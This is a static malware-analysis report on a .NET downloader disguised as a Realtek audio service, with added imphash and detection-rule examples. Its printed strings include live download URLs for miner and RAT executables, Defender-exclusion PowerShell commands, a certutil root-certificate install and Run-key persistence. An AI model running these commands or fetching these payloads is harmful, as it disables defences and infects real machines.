Static | ZeroBOX

PE Compile Time

2098-08-24 02:53:22 (not a real build time: this is a .NET assembly, and deterministic builds write a hash of the compilation inputs into the PE timestamp field; the RFC 3161 countersignature time visible in the strings below, 2024-02-22 18:54:13 UTC, is the usable date anchor)

PDB Path

C:\Work\Sources1\Loader\Loader\obj\Debug\Loader.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744 (the generic .NET imphash: every managed executable whose only native import is mscoree!_CorExeMain hashes to this value, so it cannot be used to pivot to related samples)

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00002000       0x0000189c    0x00001a00        4.73875814989
.rsrc   0x00004000       0x00000498    0x00000600        2.68585802664
.reloc  0x00006000       0x0000000c    0x00000200        0.0815394123432

Resources

Name        Offset      Size        Language      Sub-language     File type
RT_VERSION  0x00004058  0x0000043c  LANG_NEUTRAL  SUBLANG_NEUTRAL  data

Imports

Library mscoree.dll:
0x402000 _CorExeMain
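Added example, not part of the ZeroBOX report: a re-implementation of the import hash (imphash) as computed by pefile and VirusTotal, run over the sample's own import table and over two constructed import tables for contrast. It shows why the imphash above is shared by essentially every C# executable and is worthless as a pivot for this sample. The only simplification versus pefile is that ordinal imports are rendered as "ordN" without pefile's name lookup for known ws2_32/oleaut32 ordinals; the helper and list names are this example's own.

```python
from __future__ import annotations

import hashlib


def imphash(imports: list[tuple[str, str | int]]) -> str:
    """Import hash as pefile.get_imphash() computes it.

    imports: (dll, function-name-or-ordinal) pairs in import-table order.
    Each entry becomes "lib.func" with the library lowercased and its
    .dll/.ocx/.sys extension stripped; entries are joined with "," and MD5'd.
    """
    parts = []
    for dll, func in imports:
        lib = dll.lower()
        for ext in (".ocx", ".sys", ".dll"):
            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        # Simplification: pefile resolves some well-known ordinals to names.
        name = f"ord{func}" if isinstance(func, int) else func.lower()
        parts.append(f"{lib}.{name}")
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


def is_generic_dotnet_imphash(h: str) -> bool:
    """True when the hash is just the CLR entry-point stub (exe or dll),
    i.e. it says nothing about the managed code inside."""
    return h in {
        imphash([("mscoree.dll", "_CorExeMain")]),
        imphash([("mscoree.dll", "_CorDllMain")]),
    }


# The sample's import table, taken from the Imports section of the report.
LOADER_IMPORTS = [("mscoree.dll", "_CorExeMain")]

# Constructed import tables for contrast (not from the report):
# an unrelated C# executable and a hypothetical native downloader.
OTHER_DOTNET_EXE = [("mscoree.dll", "_CorExeMain")]
NATIVE_DOWNLOADER = [
    ("KERNEL32.dll", "CreateFileW"),
    ("KERNEL32.dll", "WriteFile"),
    ("WININET.dll", "InternetOpenUrlA"),
]


if __name__ == "__main__":
    for label, table in (("Loader.exe", LOADER_IMPORTS),
                         ("other C# exe", OTHER_DOTNET_EXE),
                         ("native downloader", NATIVE_DOWNLOADER)):
        h = imphash(table)
        print(f"{label:18} {h}  generic-.NET={is_generic_dotnet_imphash(h)}")
```

For managed samples, pivot on the TypeRef/MemberRef names from the #Strings heap (the DownloadFile, OpenSubKey, Add-MpPreference strings below) or on a TypeRef hash rather than on the imphash.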

!This program cannot be run in DOS mode.
.rsrc
.reloc
v4.0.30319
#Strings
Microsoft.Win32
<Module>
System.IO
mscorlib
RegistryValueKind
DownloadFile
set_FileName
System.Net.Mime
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
SetValue
Loader.exe
System.Runtime.Versioning
ToString
Program
System
get_Location
System.Reflection
set_StartInfo
ProcessStartInfo
DirectoryInfo
Loader
CurrentUser
set_RedirectStandardError
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
MediaTypeNames
Process
set_Arguments
Exists
Concat
Object
System.Net
WebClient
set_RedirectStandardOutput
set_CreateNoWindow
OpenSubKey
RegistryKey
GetExecutingAssembly
CreateDirectory
GetCurrentDirectory
Registry
WrapNonExceptionThrows
Realtek HD Audio Universal Service
Realtek Semiconductor
2022 (c) Realtek Semiconductor. All rights reserved.
6538d43b-cc54-4fb6-95d9-c31675ca5a7a
1.1.490.1
.NETFramework,Version=v4.7.2
FrameworkDisplayName
.NET Framework 4.7.2
C:\Work\Sources1\Loader\Loader\obj\Debug\Loader.pdb
_CorExeMain
mscoree.dll
Realtek Semiconductor Corp.
240220121134Z
250220123134Z
Realtek Semiconductor Corp.
Realtek Semiconductor Corp.
20240222185413Z
DigiCert, Inc.
DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA
230714000000Z
341013235959Z
DigiCert, Inc.
DigiCert Timestamp 2023
http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
http://ocsp.digicert.com
http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
DigiCert Inc
www.digicert.com
DigiCert Trusted Root G4
220323000000Z
370322235959Z
DigiCert, Inc.
DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA
http://ocsp.digicert.com
http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
http://crl3.digicert.com/DigiCertTrustedRootG4.crl
DigiCert Inc
www.digicert.com
DigiCert Assured ID Root CA
220801000000Z
311109235959Z
DigiCert Inc
www.digicert.com
DigiCert Trusted Root G4
http://ocsp.digicert.com
http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
DigiCert, Inc.
DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA
240222185413Z
C:\ProgramData\Microsoft\Diagnosis\
Microsoft.ServiceHub.Control.exe
Microsoft.ServiceHub.Anyns.exe
Microsoft.ServiceHub.Header.exe
Microsoft.ServiceHub.Taskhost.exe
Microsoft.ServiceHub.Runtime.exe
rtt.cer
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RtkAudUApp64
Software\Policies\Microsoft\Windows\System
DisableCMD
00000000
powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Control.exe
powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Anyns.exe
powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Header.exe
powershell -Command Add-MpPreference -ExclusionPath
powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Taskhost.exe
powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Runtime.exe
Sideload\
http://a0920080.xsph.ru/KZ1/control.exe
http://a0920080.xsph.ru/KZ1/asyns.exe
http://a0920080.xsph.ru/KZ1/thost.exe
http://a0920080.xsph.ru/HeaderFinder.exe
http://a0920080.xsph.ru/miner.exe
http://a0920080.xsph.ru/rtt.cer
certutil.exe
-addstore root
Sideload\rtt.cer
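Added example, not part of the ZeroBOX report: detection logic for the host-side behaviour the strings above imply (Defender exclusions added via Add-MpPreference, certutil -addstore root for rtt.cer, a Run-key value named RtkAudUApp64 pointing into C:\ProgramData\Microsoft\Diagnosis\, and the DisableCMD policy), run over a handful of constructed Sysmon-style records (process creation and registry value set). The record layout, rule names, severities and the sample records are this example's own; the exact certutil command line, the Run-key target and the DisableCMD data are reconstructed from the string fragments, not taken from the report.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class Finding:
    rule: str
    severity: str
    detail: str


# T1562.001: Defender exclusion added from a command line (any -Exclusion* switch).
RE_MP_EXCLUSION = re.compile(
    r"add-mppreference\b.*?-exclusion(?:process|path|extension|ipaddress)\s+"
    r"(?P<value>\"[^\"]+\"|'[^']+'|\S+)",
    re.IGNORECASE,
)
# T1553.004: certutil installing a certificate into the Root store.
RE_CERTUTIL_ROOT = re.compile(
    r"\bcertutil(?:\.exe)?\b.*?-addstore\s+(?:-f\s+)?(?:-user\s+)?\"?root\"?\s+(?P<value>\S+)",
    re.IGNORECASE,
)
# Locations a standard user can write to: an exclusion or autorun pointing
# here is far more suspicious than one under Program Files.
RE_USER_WRITABLE = re.compile(
    r"^[a-z]:\\(?:programdata|users\\[^\\]+\\appdata|windows\\temp)\\", re.IGNORECASE
)
RE_RUN_KEY = re.compile(r"\\microsoft\\windows\\currentversion\\run(?:once)?$", re.IGNORECASE)
RE_CMD_POLICY_KEY = re.compile(r"\\policies\\microsoft\\windows\\system$", re.IGNORECASE)


def _severity_for_path(p: str) -> str:
    return "high" if RE_USER_WRITABLE.match(p.strip("\"'")) else "medium"


def _nonzero(data: str) -> bool:
    """DisableCMD=1 disables cmd.exe and batch files, 2 only cmd.exe; 0 is off."""
    s = data.strip().lower()
    try:
        return int(s, 16 if s.startswith("0x") else 10) != 0
    except ValueError:
        return bool(s)


def check_process(cmdline: str) -> list[Finding]:
    out = []
    m = RE_MP_EXCLUSION.search(cmdline)
    if m:
        out.append(Finding("defender_exclusion", _severity_for_path(m["value"]), m["value"]))
    m = RE_CERTUTIL_ROOT.search(cmdline)
    if m:
        out.append(Finding("certutil_root_store", "high", m["value"]))
    return out


def check_registry(key: str, value: str, data: str) -> list[Finding]:
    out = []
    if RE_RUN_KEY.search(key):
        out.append(Finding("run_key_persistence", _severity_for_path(data), f"{value} -> {data}"))
    if RE_CMD_POLICY_KEY.search(key) and value.lower() == "disablecmd" and _nonzero(data):
        out.append(Finding("cmd_disabled_policy", "medium", f"{value}={data}"))
    return out


def scan(records: list[dict]) -> list[Finding]:
    findings: list[Finding] = []
    for r in records:
        if r["event"] == "process_create":
            findings.extend(check_process(r["cmdline"]))
        elif r["event"] == "registry_set":
            findings.extend(check_registry(r["key"], r["value"], r["data"]))
    return findings


# Constructed sample records modelled on the strings in the report.
SAMPLE_RECORDS = [
    {"event": "process_create", "cmdline": "powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Control.exe"},
    {"event": "process_create", "cmdline": "powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Anyns.exe"},
    {"event": "process_create", "cmdline": "powershell -Command Add-MpPreference -ExclusionPath C:\\ProgramData\\Microsoft\\Diagnosis\\"},
    {"event": "process_create", "cmdline": "certutil.exe -addstore root C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload\\rtt.cer"},
    {"event": "registry_set", "key": "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
     "value": "RtkAudUApp64", "data": "C:\\ProgramData\\Microsoft\\Diagnosis\\Microsoft.ServiceHub.Control.exe"},
    {"event": "registry_set", "key": "HKCU\\Software\\Policies\\Microsoft\\Windows\\System",
     "value": "DisableCMD", "data": "1"},
    # Benign noise: the HKLM Run entry is reported at medium, the other two must not fire.
    {"event": "process_create", "cmdline": "powershell -Command Get-MpPreference"},
    {"event": "process_create", "cmdline": "certutil.exe -hashfile C:\\Windows\\notepad.exe SHA256"},
    {"event": "registry_set", "key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
     "value": "SecurityHealth", "data": "C:\\Windows\\system32\\SecurityHealthSystray.exe"},
]


if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"[{f.severity:6}] {f.rule:22} {f.detail}")
```

Severity is keyed on the target path rather than the rule alone: every Run-key write is worth a line, but one that points into C:\ProgramData or a user profile, like RtkAudUApp64 here, deserves the alert.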
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
Realtek HD Audio Universal Service
CompanyName
Realtek Semiconductor
FileDescription
Realtek HD Audio Universal Service
FileVersion
1.1.490.1
InternalName
Loader.exe
LegalCopyright
2022 (c) Realtek Semiconductor. All rights reserved.
LegalTrademarks
OriginalFilename
Loader.exe
ProductName
Realtek HD Audio Universal Service
ProductVersion
1.1.490.1
Assembly Version
1.1.490.1
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.PowerShell.4!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh RDN/Generic Downloader.x
ALYac Clean
Cylance unsafe
Zillya Clean
Sangfor Downloader.Msil.Small.Vejl
K7AntiVirus Trojan-Downloader ( 005b31a31 )
Alibaba Trojan:MSIL/PowerShell.979ce496
K7GW Trojan-Downloader ( 005b31a31 )
Cybereason Clean
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.A
Paloalto Clean
Symantec Trojan.Gen.MBT
Elastic Clean
ESET-NOD32 a variant of MSIL/TrojanDownloader.Small.DCN
APEX Clean
Avast Win32:RATX-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.MSIL.PowerShell.gen
BitDefender Trojan.GenericKD.72035715
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericKD.72035715
Tencent Malware.Win32.Gencirc.1405c70b
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Trojan.TR/Dldr.Small.rywqk
DrWeb Trojan.DownLoader46.55016
VIPRE Trojan.GenericKD.72035715
TrendMicro Backdoor.Win32.ASYNCRAT.YXECRZ
Trapmine Clean
FireEye Trojan.GenericKD.72035715
Emsisoft Trojan.GenericKD.72035715 (B)
SentinelOne Static AI - Suspicious PE
GData Trojan.GenericKD.72035715
Jiangmin Clean
Webroot W32.Trojan.Msil
Varist W32/ABRisk.XCII-7111
Avira TR/Dldr.Small.rywqk
Antiy-AVL Trojan[Downloader]/MSIL.Small
Kingsoft MSIL.Trojan.PowerShell.gen
Gridinsoft Clean
Xcitium Malware@#p1vpfb3or85r
Arcabit Trojan.Generic.D44B2D83
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.MSIL.PowerShell.gen
Microsoft Trojan:Win32/CoinMiner.N!cl
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee RDN/Generic Downloader.x
MAX malware (ai score=81)
VBA32 Clean
Malwarebytes Trojan.Downloader.BTCM
Panda Trj/Chgt.AD
Zoner Clean
TrendMicro-HouseCall Backdoor.Win32.ASYNCRAT.YXECRZ
Rising Downloader.Small!8.B41 (CLOUD)
Yandex Clean
Ikarus Trojan-Downloader.MSIL.Small
MaxSecure Clean
Fortinet MSIL/Small.DCN!tr.dldr
BitDefenderTheta Gen:NN.ZemsilF.36802.bm1@aiAd8Kh
AVG Win32:RATX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Trojan[downloader]:MSIL/PowerShell.gen
No IRMA results available.